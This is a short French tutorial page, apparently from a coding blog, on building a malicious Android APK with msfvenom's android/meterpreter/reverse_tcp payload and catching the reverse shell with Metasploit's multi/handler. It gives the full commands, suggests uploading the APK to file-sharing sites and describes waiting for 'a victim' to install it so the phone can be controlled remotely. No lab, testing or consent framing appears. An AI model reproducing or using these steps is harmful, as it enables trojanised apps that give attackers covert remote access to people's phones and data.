• Votre panier est vide.

  • COMPTE

Créer un payload Android avec Kali Linux

Créer un payload Android avec Kali Linux

Pour créer votre payload sur le système d’exploitation Kali Linux, il vous suffit de démarrer un terminal et d’utiliser la commande suivante :

msfvenom -p android/meterpreter/reverse_tcp LHOST=VOTRE_IP LPORT=LE_PORT R chemin_de_votre_apk

Créer une application Android avec Kali Linux

• -p :Pour spécifier votre meterpreter.
• LHOST : Votre IP locale.
• LPORT : Le port sur lequel vous souhaitez écouter.
• >/root/FILENAME.apk :  Le chemin de fichier de votre apk

Une fois votre apk généré, vous pouvez l’uploader sur des sites tel que Dropbox, Mega, Uptobox, etc…

Vous pouvez maintenant exploiter des téléphones Android (uniquement sur sur votre réseau local si vous avez utilisé votre adresse IP locale).
Toutefois, lors de l’installation de l’application il faudra autoriser les sources inconnues sur le téléphone sans quoi celle-ci ne pourra être installée.

Créer une application Android avec Kali Linux

 

Mettre en place l’écoute

Une fois votre APK créé sur votre ordinateur, ouvrez un autre terminal et tapez la commande :

msfconsole

 

Après le chargement, chargez l’exploit multi-handler en tapant:

use exploit/multi/handler

Configurez une charge utile (inverse) en tapant:

set payload android/meterpreter/reverse_tcp

Puis définissez l’IP de l’hôte :

set LHOST 192.168.0.4

 

Créer une application Android avec Kali Linux

 

Nous devons également définir le port sur le quelle l’apk va écouter :

set LPORT 4895

Il ne nous reste plus qu’à faire la commande exploit et d’attendre qu’une victime télécharge notre apk.

Dans notre exemple, voici ce à quoi ressemble une victime qui vient de se connecter :

Créer une application Android avec Kali Linux

Nous avons la possibilité d’utiliser une multitude de commandes mises à notre disposition.

Pièces jointes2

TOUT VOIR Ajouter une remarque
VOUS
Ajouter votre commentaire
Culte du code | 2015-2020  (Vecteurs par Freepik, Parallax par fullvector)